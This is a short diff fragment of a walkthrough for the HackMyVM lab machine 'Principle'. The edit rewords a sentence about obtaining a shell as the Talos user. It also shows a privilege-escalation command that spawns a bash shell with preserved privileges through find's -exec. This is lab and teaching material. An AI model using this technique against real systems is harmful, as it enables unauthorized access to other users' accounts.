garffff-bot/garffff-bot.github.io/content/Hackmyvm/Medium/Principle.md

 ![[Pasted image 20240802190613.png]]

-Using that command we have a shell as the Talos user, but we are not in the correct user group:
+Using the command in the screenshot above, we can get a shell as the Talos user, but we are not in the correct user group:

 ```bash
 www-data@principle:~/html$ find . -exec /bin/bash -p \; -quit